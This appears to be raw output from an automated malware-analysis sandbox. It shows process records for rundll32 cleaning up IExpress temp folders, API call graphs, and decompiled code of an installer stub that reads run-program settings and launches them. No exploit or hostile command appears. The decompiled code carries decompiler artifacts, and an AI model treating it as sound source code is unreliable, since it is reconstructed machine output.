                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff6dbfe0000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:11:38:31
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff6dbfe0000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:28.6%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:28.1%
                                                                                                                                                                                                                                            Total number of Nodes:960
                                                                                                                                                                                                                                            Total number of Limit Nodes:25
2916 8d595b CloseHandle GetFileAttributesA 2914->2916 2915->2843 2915->2844 2916->2911 2918 8d26b9 2917->2918 2919 8d26e5 2917->2919 2920 8d171e _vsnprintf 2918->2920 2921 8d271f 2919->2921 2922 8d26ea 2919->2922 2923 8d26cc 2920->2923 2928 8d171e _vsnprintf 2921->2928 2932 8d26e3 2921->2932 2924 8d171e _vsnprintf 2922->2924 2925 8d44b9 20 API calls 2923->2925 2927 8d26fd 2924->2927 2925->2932 2926 8d6ce0 4 API calls 2929 8d276d 2926->2929 2930 8d44b9 20 API calls 2927->2930 2931 8d2735 2928->2931 2929->2881 2930->2932 2933 8d44b9 20 API calls 2931->2933 2932->2926 2933->2932 2935 8d468f 7 API calls 2934->2935 2936 8d4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 8d5020 2936->2937 2949 8d515f 2936->2949 2938 8d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2938 2939 8d5057 2937->2939 2938->2939 2953 8d4efd 2939->2953 2942 8d507c 2945 8d44b9 20 API calls 2942->2945 2948 8d5075 2942->2948 2943 8d5060 2944 8d44b9 20 API calls 2943->2944 2944->2948 2945->2948 2946 8d511d 2950 8d513a 2946->2950 2951 8d44b9 20 API calls 2946->2951 2947 8d5110 FreeResource 2947->2946 2948->2946 2948->2947 2949->2737 2950->2949 2952 8d514c SendMessageA 2950->2952 2951->2950 2952->2949 2954 8d4f4a 2953->2954 2955 8d4980 25 API calls 2954->2955 2960 8d4fa1 2954->2960 2958 8d4f67 2955->2958 2956 8d6ce0 4 API calls 2957 8d4fc6 2956->2957 2957->2942 2957->2943 2959 8d4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 8d255b 2961->2962 2963 8d2510 2961->2963 2965 8d6ce0 4 API calls 2962->2965 2964 8d658a CharPrevA 2963->2964 2966 8d2522 WritePrivateProfileStringA _lopen 2964->2966 2967 8d2569 2965->2967 2966->2962 2968 8d2548 _llseek _lclose 2966->2968 2967->2747 2968->2962 2970 8d1b25 2969->2970 3074 8d1a84 2970->3074 2972 8d1b57 2973 8d658a CharPrevA 2972->2973 2974 8d1b8c 2972->2974 2973->2974 2975 8d66c8 2 API calls 2974->2975 2976 8d1bd1 2975->2976 2977 8d1bd9 CompareStringA 2976->2977 2978 8d1d73 2976->2978 2977->2978 2979 8d1bf7 
GetFileAttributesA 2977->2979 2980 8d66c8 2 API calls 2978->2980 2981 8d1c0d 2979->2981 2982 8d1d53 2979->2982 2983 8d1d7d 2980->2983 2981->2982 2987 8d1a84 2 API calls 2981->2987 2986 8d1d64 2982->2986 2984 8d1df8 LocalAlloc 2983->2984 2985 8d1d81 CompareStringA 2983->2985 2984->2986 2988 8d1e0b GetFileAttributesA 2984->2988 2985->2984 2995 8d1d9b 2985->2995 2989 8d44b9 20 API calls 2986->2989 2992 8d1c31 2987->2992 2990 8d1e1d 2988->2990 2991 8d1e45 2988->2991 3004 8d1d6c 2989->3004 2990->2991 3080 8d2aac 2991->3080 2993 8d1c50 LocalAlloc 2992->2993 2997 8d1a84 2 API calls 2992->2997 2993->2986 3000 8d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->3000 2994 8d6ce0 4 API calls 2996 8d1ea1 2994->2996 2995->2995 2998 8d1dbe LocalAlloc 2995->2998 2996->2752 2997->2993 2998->2986 3002 8d1de1 2998->3002 3003 8d1cf8 3000->3003 3008 8d1cc2 3000->3008 3007 8d171e _vsnprintf 3002->3007 3005 8d1d09 GetShortPathNameA 3003->3005 3006 8d1d23 3003->3006 3004->2994 3005->3006 3009 8d171e _vsnprintf 3006->3009 3007->3008 3008->3004 3009->3008 3011 8d209a 3010->3011 3012 8d2256 3010->3012 3014 8d171e _vsnprintf 3011->3014 3017 8d20dc 3011->3017 3013 8d6ce0 4 API calls 3012->3013 3015 8d2263 3013->3015 3016 8d20af RegQueryValueExA 3014->3016 3015->2752 3016->3011 3016->3017 3018 8d20fb GetSystemDirectoryA 3017->3018 3019 8d20e4 RegCloseKey 3017->3019 3020 8d658a CharPrevA 3018->3020 3019->3012 3021 8d211b LoadLibraryA 3020->3021 3022 8d212e GetProcAddress FreeLibrary 3021->3022 3023 8d2179 GetModuleFileNameA 3021->3023 3022->3023 3024 8d214e GetSystemDirectoryA 3022->3024 3025 8d21de RegCloseKey 3023->3025 3028 8d2177 3023->3028 3026 8d2165 3024->3026 3024->3028 3025->3012 3027 8d658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 8d21b7 LocalAlloc 3028->3029 3030 8d21cd 3029->3030 3031 8d21ec 3029->3031 3032 8d44b9 20 API calls 3030->3032 3033 8d171e _vsnprintf 3031->3033 3032->3025 3034 8d2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 8d4016 
CreateProcessA 3036->3037 3048 8d4106 3036->3048 3038 8d40c4 3037->3038 3039 8d4041 WaitForSingleObject GetExitCodeProcess 3037->3039 3043 8d6285 GetLastError 3038->3043 3041 8d4070 3039->3041 3040 8d6ce0 4 API calls 3042 8d4117 3040->3042 3107 8d411b 3041->3107 3042->2752 3044 8d40c9 GetLastError FormatMessageA 3043->3044 3046 8d44b9 20 API calls 3044->3046 3046->3048 3047 8d4096 CloseHandle CloseHandle 3047->3048 3049 8d40ba 3047->3049 3048->3040 3049->3048 3051 8d64c2 3050->3051 3052 8d658a CharPrevA 3051->3052 3053 8d64d8 GetFileAttributesA 3052->3053 3054 8d64ea 3053->3054 3055 8d6501 LoadLibraryA 3053->3055 3054->3055 3056 8d64ee LoadLibraryExA 3054->3056 3057 8d6508 3055->3057 3056->3057 3058 8d6ce0 4 API calls 3057->3058 3059 8d6513 3058->3059 3059->2785 3061 8d2289 RegOpenKeyExA 3060->3061 3062 8d2381 3060->3062 3061->3062 3064 8d22b1 RegQueryValueExA 3061->3064 3063 8d6ce0 4 API calls 3062->3063 3065 8d238c 3063->3065 3066 8d2374 RegCloseKey 3064->3066 3067 8d22e6 memset GetSystemDirectoryA 3064->3067 3065->2759 3066->3062 3068 8d230f 3067->3068 3069 8d2321 3067->3069 3070 8d658a CharPrevA 3068->3070 3071 8d171e _vsnprintf 3069->3071 3070->3069 3072 8d233f RegSetValueExA 3071->3072 3072->3066 3075 8d1a9a 3074->3075 3077 8d1aaf 3075->3077 3079 8d1aba 3075->3079 3093 8d667f 3075->3093 3078 8d667f 2 API calls 3077->3078 3077->3079 3078->3077 3079->2972 3081 8d2be6 3080->3081 3082 8d2ad4 GetModuleFileNameA 3080->3082 3083 8d6ce0 4 API calls 3081->3083 3084 8d2b02 3082->3084 3086 8d2bf5 3083->3086 3084->3081 3085 8d2af1 IsDBCSLeadByte 3084->3085 3087 8d2bca CharNextA 3084->3087 3088 8d2b11 CharNextA CharUpperA 3084->3088 3090 8d2bd3 CharNextA 3084->3090 3092 8d2b43 CharPrevA 3084->3092 3098 8d65e8 3084->3098 3085->3084 3086->3004 3087->3090 3088->3084 3089 8d2b8d CharUpperA 3088->3089 3089->3084 3090->3084 3092->3084 3095 8d6689 3093->3095 3094 8d6648 IsDBCSLeadByte 3094->3095 3095->3094 3096 8d66a5 3095->3096 3097 8d6697 CharNextA 3095->3097 3096->3075 
3097->3095 3099 8d65f4 3098->3099 3099->3099 3100 8d65fb CharPrevA 3099->3100 3101 8d6611 CharPrevA 3100->3101 3102 8d661e 3101->3102 3103 8d660b 3101->3103 3104 8d663d 3102->3104 3105 8d6634 CharNextA 3102->3105 3106 8d6627 CharPrevA 3102->3106 3103->3101 3103->3102 3104->3084 3105->3104 3106->3104 3106->3105 3108 8d4132 3107->3108 3110 8d412a 3107->3110 3111 8d1ea7 3108->3111 3110->3047 3112 8d1ed3 3111->3112 3113 8d1eba 3111->3113 3112->3110 3114 8d256d 15 API calls 3113->3114 3114->3112 3116 8d2026 3115->3116 3117 8d1ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 8d200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3228 8d19e0 3229 8d1a24 GetDesktopWindow 3228->3229 3230 8d1a03 3228->3230 3231 8d43d0 11 API calls 3229->3231 3232 8d1a16 EndDialog 3230->3232 3233 8d1a20 3230->3233 3234 8d1a33 LoadStringA SetDlgItemTextA MessageBeep 3231->3234 3232->3233 3235 8d6ce0 4 API calls 3233->3235 3234->3233 3236 8d1a7e 3235->3236 3237 8d6a20 __getmainargs 3238 8d69b0 3239 8d69b5 3238->3239 3247 8d6fbe GetModuleHandleW 3239->3247 3241 8d69c1 __set_app_type __p__fmode __p__commode 3242 8d69f9 3241->3242 3243 8d6a0e 3242->3243 3244 8d6a02 __setusermatherr 3242->3244 3249 8d71ef _controlfp 3243->3249 3244->3243 3246 8d6a13 3248 8d6fcf 3247->3248 3248->3241 3249->3246 3250 8d34f0 3251 8d3504 3250->3251 3252 8d35b8 3250->3252 3251->3252 3253 8d35be GetDesktopWindow 3251->3253 3254 8d351b 3251->3254 3258 8d3671 EndDialog 3252->3258 3261 8d3526 3252->3261 3255 8d43d0 11 API calls 3253->3255 3256 8d354f 3254->3256 3257 8d351f 3254->3257 3259 8d35d6 3255->3259 3256->3261 3262 8d3559 ResetEvent 3256->3262 3260 8d352d TerminateThread EndDialog 3257->3260 3257->3261 3258->3261 3263 8d361d SetWindowTextA CreateThread 3259->3263 3264 8d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3259->3264 3260->3261 3265 8d44b9 20 API calls 3262->3265 3263->3261 3266 8d3646 3263->3266 3264->3263 3267 8d3581 3265->3267 3268 8d44b9 20 API calls 3266->3268 3269 8d359b SetEvent 
3267->3269 3270 8d358a SetEvent 3267->3270 3268->3252 3271 8d3680 4 API calls 3269->3271 3270->3261 3271->3252 3272 8d6ef0 3273 8d6f2d 3272->3273 3275 8d6f02 3272->3275 3274 8d6f27 ?terminate@ 3274->3273 3275->3273 3275->3274 3276 8d7270 _except_handler4_common

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
C-Code - Quality: 82%
E008D3BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0x8d9124 =  *0x8d9124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0x8d8a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0x8d8c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E008D468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E008D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E008D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E008D3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0x8d8580;
                                                                                                                                                                                                                                            													if( *0x8d8580 != 0) {
                                                                                                                                                                                                                                            														E008D2267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0x8d8180;
                                                                                                                                                                                                                                            											if( *0x8d8180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0x8d9124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x8d9a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E008D6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x8d8a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0x8d9a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0x8d8a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0x8d9154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0x8d91e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0x8d8a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0x8d9a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0x8d8d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0x8d9a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0x8da288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0x8d9124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x8d9a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x8d8a20;
                                                                                                                                                                                                                                            										if( *0x8d8a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E008D202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E008D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x8d8c42;
									if( *0x8d8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x8d8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E008D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E008D468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E008D1781( &_v276, 0x104, _t130, 0x8d8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E008D468F(_t130, 0x8d9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
                                                                                                                                                                                                                                            0x008d3f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f47
                                                                                                                                                                                                                                            0x008d3f1e
                                                                                                                                                                                                                                            0x008d3f1f
                                                                                                                                                                                                                                            0x008d3f25
                                                                                                                                                                                                                                            0x008d3f26
                                                                                                                                                                                                                                            0x008d3f2a
                                                                                                                                                                                                                                            0x008d3f2d
                                                                                                                                                                                                                                            0x008d3fd9
                                                                                                                                                                                                                                            0x008d3fd9
                                                                                                                                                                                                                                            0x008d3fda
                                                                                                                                                                                                                                            0x008d3fda
                                                                                                                                                                                                                                            0x008d3fe1
                                                                                                                                                                                                                                            0x008d3fe3
                                                                                                                                                                                                                                            0x008d3fe3
                                                                                                                                                                                                                                            0x008d3fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3fe8
                                                                                                                                                                                                                                            0x008d3f33
                                                                                                                                                                                                                                            0x008d3f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f37
                                                                                                                                                                                                                                            0x008d3dee
                                                                                                                                                                                                                                            0x008d3dee
                                                                                                                                                                                                                                            0x008d3df5
                                                                                                                                                                                                                                            0x008d3fad
                                                                                                                                                                                                                                            0x008d3fb9
                                                                                                                                                                                                                                            0x008d3fc2
                                                                                                                                                                                                                                            0x008d3fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3fc8
                                                                                                                                                                                                                                            0x008d3dfb
                                                                                                                                                                                                                                            0x008d3dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3e03
                                                                                                                                                                                                                                            0x008d3e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3e15
                                                                                                                                                                                                                                            0x008d3e17
                                                                                                                                                                                                                                            0x008d3e19
                                                                                                                                                                                                                                            0x008d3f94
                                                                                                                                                                                                                                            0x008d3fa4
                                                                                                                                                                                                                                            0x008d3f7c
                                                                                                                                                                                                                                            0x008d3f80
                                                                                                                                                                                                                                            0x008d3f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f8b
                                                                                                                                                                                                                                            0x008d3e2c
                                                                                                                                                                                                                                            0x008d3e30
                                                                                                                                                                                                                                            0x008d3e34
                                                                                                                                                                                                                                            0x008d3e36
                                                                                                                                                                                                                                            0x008d3f69
                                                                                                                                                                                                                                            0x008d3f6e
                                                                                                                                                                                                                                            0x008d3f70
                                                                                                                                                                                                                                            0x008d3f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f76
                                                                                                                                                                                                                                            0x008d3e3c
                                                                                                                                                                                                                                            0x008d3e43
                                                                                                                                                                                                                                            0x008d3e47
                                                                                                                                                                                                                                            0x008d3e52
                                                                                                                                                                                                                                            0x008d3e56
                                                                                                                                                                                                                                            0x008d3e5c
                                                                                                                                                                                                                                            0x008d3e61
